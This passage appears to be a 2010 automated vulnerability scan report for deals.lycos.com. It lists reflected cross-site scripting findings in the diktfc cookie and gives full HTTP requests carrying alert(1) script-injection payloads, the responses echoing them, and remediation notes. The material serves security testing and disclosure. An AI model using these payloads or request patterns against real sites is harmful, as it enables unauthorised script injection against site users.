User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373"%3balert(1)//cb851bc2ef; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12888
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b481"><script>alert(1)</script>a5c183e28ee was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/bootstrap.js&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25a4"%3balert(1)//d3e20f2e46f was submitted in the diktfc cookie. This input was echoed as a25a4";alert(1)//d3e20f2e46f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4"%3balert(1)//d3e20f2e46f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42885
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ede"><script>alert(1)</script>07af65f492e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/coupons&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ef"><script>alert(1)</script>40c20ce42a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/coupons/stores&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c07ea"%3balert(1)//565a1b485f was submitted in the diktfc cookie. This input was echoed as c07ea";alert(1)//565a1b485f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea"%3balert(1)//565a1b485f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74602
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa21f"><script>alert(1)</script>c82f0e9250f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d1"%3balert(1)//99923b16c8b was submitted in the diktfc cookie. This input was echoed as bd5d1";alert(1)//99923b16c8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1"%3balert(1)//99923b16c8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17720
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830f7"%3balert(1)//a3a48905539 was submitted in the diktfc cookie. This input was echoed as 830f7";alert(1)//a3a48905539 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7"%3balert(1)//a3a48905539; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18163
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ef0"><script>alert(1)</script>8b18dd23c04 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... rc="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8507a"%3balert(1)//42fd6a583c was submitted in the diktfc cookie. This input was echoed as 8507a";alert(1)//42fd6a583c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a"%3balert(1)//42fd6a583c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18680
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a778"><script>alert(1)</script>da4cec6ed03 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... /b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b224"><script>alert(1)</script>91319e796f3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82444"%3balert(1)//6b826531f72 was submitted in the diktfc cookie. This input was echoed as 82444";alert(1)//6b826531f72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444"%3balert(1)//6b826531f72; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17889
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1d2"%3balert(1)//3b0a90ac364 was submitted in the diktfc cookie. This input was echoed as 3f1d2";alert(1)//3b0a90ac364 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
